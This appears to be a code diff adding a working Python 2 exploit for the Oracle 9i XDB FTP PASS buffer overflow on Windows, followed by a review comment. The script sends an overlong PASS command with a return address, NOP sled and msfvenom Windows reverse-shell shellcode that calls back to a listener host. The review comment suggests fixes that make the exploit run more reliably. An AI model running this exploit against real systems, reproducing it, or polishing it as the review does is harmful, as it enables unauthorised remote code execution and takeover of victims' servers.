|
| 1 | +#!/usr/bin/python |
| 2 | +## oracle_9i_xdb_ftp.py |
| 3 | +## |
| 4 | +## Name: Oracle 9i XDB FTP PASS Overflow (win32)', |
| 5 | +## Description: By passing an overly long string to the PASScommand, a |
| 6 | +## stack based buffer overflow occurs. David Litchfield, has |
| 7 | +## illustrated multiple vulnerabilities inthe Oracle 9i XML |
| 8 | +## Database (XDB), during a seminar on "Variations inexploit |
| 9 | +## methods between Linux andWindows" presented at the Blackhat |
| 10 | +## conference. |
| 11 | +## |
| 12 | +## Author: charles.holtzkampf [at] gmail.com |
| 13 | +## WWW:www.bommachine.co.uk |
| 14 | +## Usage: python oracle_9i_xdb_ftp.py <IP Address> <Port> |
| 15 | + |
| 16 | +import sys, socket |
| 17 | + |
| 18 | + |
| 19 | +rhost = sys.argv[1] ## Target IP address as command line argument |
| 20 | +rport = int(sys.argv[2]) ## Target Port as command line argument |
| 21 | + |
| 22 | + |
| 23 | + |
| 24 | + |
| 25 | +ret = "\x46\x6d\x61\x60" ## oraclient9.dll (pop/pop/ret) |
| 26 | +prepend = "\x81\xc4\xff\xef\xff\xff\x44" ## following the NOP sled, but before the decoder machine code |
| 27 | + |
| 28 | + |
| 29 | + |
| 30 | + |
| 31 | +## Max space for shell code = 800 |
| 32 | +## Bad characters according to metasploit: \x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40 |
| 33 | +## Generate payload: msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.47 LPORT=4443 EXITFUNC=thread -a x86 --platform Windows -b \x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40 -f python -v shellcode |
| 34 | +## Payloads size = 348 |
| 35 | + |
| 36 | +shellcode = "" |
| 37 | +shellcode += "\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e" |
| 38 | +shellcode += "\x81\x76\x0e\x94\x8c\x91\xbd\x83\xee\xfc\xe2\xf4" |
| 39 | +shellcode += "\x68\x64\x13\xbd\x94\x8c\xf1\x34\x71\xbd\x51\xd9" |
| 40 | +shellcode += "\x1f\xdc\xa1\x36\xc6\x80\x1a\xef\x80\x07\xe3\x95" |
| 41 | +shellcode += "\x9b\x3b\xdb\x9b\xa5\x73\x3d\x81\xf5\xf0\x93\x91" |
| 42 | +shellcode += "\xb4\x4d\x5e\xb0\x95\x4b\x73\x4f\xc6\xdb\x1a\xef" |
| 43 | +shellcode += "\x84\x07\xdb\x81\x1f\xc0\x80\xc5\x77\xc4\x90\x6c" |
| 44 | +shellcode += "\xc5\x07\xc8\x9d\x95\x5f\x1a\xf4\x8c\x6f\xab\xf4" |
| 45 | +shellcode += "\x1f\xb8\x1a\xbc\x42\xbd\x6e\x11\x55\x43\x9c\xbc" |
| 46 | +shellcode += "\x53\xb4\x71\xc8\x62\x8f\xec\x45\xaf\xf1\xb5\xc8" |
| 47 | +shellcode += "\x70\xd4\x1a\xe5\xb0\x8d\x42\xdb\x1f\x80\xda\x36" |
| 48 | +shellcode += "\xcc\x90\x90\x6e\x1f\x88\x1a\xbc\x44\x05\xd5\x99" |
| 49 | +shellcode += "\xb0\xd7\xca\xdc\xcd\xd6\xc0\x42\x74\xd3\xce\xe7" |
| 50 | +shellcode += "\x1f\x9e\x7a\x30\xc9\xe4\xa2\x8f\x94\x8c\xf9\xca" |
| 51 | +shellcode += "\xe7\xbe\xce\xe9\xfc\xc0\xe6\x9b\x93\x73\x44\x05" |
| 52 | +shellcode += "\x04\x8d\x91\xbd\xbd\x48\xc5\xed\xfc\xa5\x11\xd6" |
| 53 | +shellcode += "\x94\x73\x44\xed\xc4\xdc\xc1\xfd\xc4\xcc\xc1\xd5" |
| 54 | +shellcode += "\x7e\x83\x4e\x5d\x6b\x59\x06\xd7\x91\xe4\x9b\xb6" |
| 55 | +shellcode += "\x94\xa3\xf9\xbf\x94\x9d\xca\x34\x72\xe6\x81\xeb" |
| 56 | +shellcode += "\xc3\xe4\x08\x18\xe0\xed\x6e\x68\x11\x4c\xe5\xb1" |
| 57 | +shellcode += "\x6b\xc2\x99\xc8\x78\xe4\x61\x08\x36\xda\x6e\x68" |
| 58 | +shellcode += "\xfc\xef\xfc\xd9\x94\x05\x72\xea\xc3\xdb\xa0\x4b" |
| 59 | +shellcode += "\xfe\x9e\xc8\xeb\x76\x71\xf7\x7a\xd0\xa8\xad\xbc" |
| 60 | +shellcode += "\x95\x01\xd5\x99\x84\x4a\x91\xf9\xc0\xdc\xc7\xeb" |
| 61 | +shellcode += "\xc2\xca\xc7\xf3\xc2\xda\xc2\xeb\xfc\xf5\x5d\x82" |
| 62 | +shellcode += "\x12\x73\x44\x34\x74\xc2\xc7\xfb\x6b\xbc\xf9\xb5" |
| 63 | +shellcode += "\x13\x91\xf1\x42\x41\x37\x71\xa0\xbe\x86\xf9\x1b" |
| 64 | +shellcode += "\x01\x31\x0c\x42\x41\xb0\x97\xc1\x9e\x0c\x6a\x5d" |
| 65 | +shellcode += "\xe1\x89\x2a\xfa\x87\xfe\xfe\xd7\x94\xdf\x6e\x68" |
| 66 | + |
| 67 | + |
| 68 | +user = "A" * 10 ## Creating random text for user |
| 69 | +passwd = "B" * 442 ## Creating random text for password |
| 70 | +jmp_short = "\xEB\x06" ## Short jump (\xEB) to an offset of 6 (\x06) according to metasploit (Rex::Arch::X86.jmp_short(6)) |
| 71 | +two_nops = "\x90\x90" ## Two NOP's as per metasploit |
| 72 | +nops = "\x90" *(800-len(shellcode)) ## Create NOP sled to bring NOPs to 800 bytes |
| 73 | + |
| 74 | +## Building the exploit |
| 75 | + |
| 76 | +exploit = passwd + jmp_short + two_nops + ret + nops + prepend + shellcode |
| 77 | + |
| 78 | + |
| 79 | +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| 80 | + |
| 81 | +try: |
| 82 | + print "\nConnecting..." |
| 83 | + s.connect((rhost,rport)) |
| 84 | + data = s.recv(1024) |
| 85 | + s.send('USER' + user +'\r\n') |
| 86 | + data = s.recv(1024) |
| 87 | + s.send('PASS ' + exploit + '\r\n') |
| 88 | + print "\nDone!" |
| 89 | + s.close |
| 90 | +except: |
| 91 | + print "Could not connect to " + rhost + ":" + str(rport) + "!" |
| 92 | + |
| 93 | + |
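Review bot: `s.send('USER' + user +'\r\n')` on the line after the connect omits the space between the verb and its argument, so the server receives `USERAAAAAAAAAA` as one unknown command and, depending on how it handles the malformed verb, the PASS line that carries the overflow may never be processed; it should read `s.sendall('USER ' + user + '\r\n')`, and the PASS line should use `sendall` as well, since `send` may return after writing only part of the ~1.3 KB buffer. `s.close` without parentheses is a bare attribute access, so the socket is never closed — use `s.close()`. The bare `except:` turns every failure, including a rejected USER or a broken send, into the "Could not connect" message; narrowing it to `except socket.error as e:` and printing `e` would tell the operator what actually went wrong. The script is Python 2 only (`print` statements, `str` payloads), which the header does not say; a note such as `## Python 2 only: under Python 3 the payload must be bytes and print needs parentheses` would save the next user a confusing TypeError.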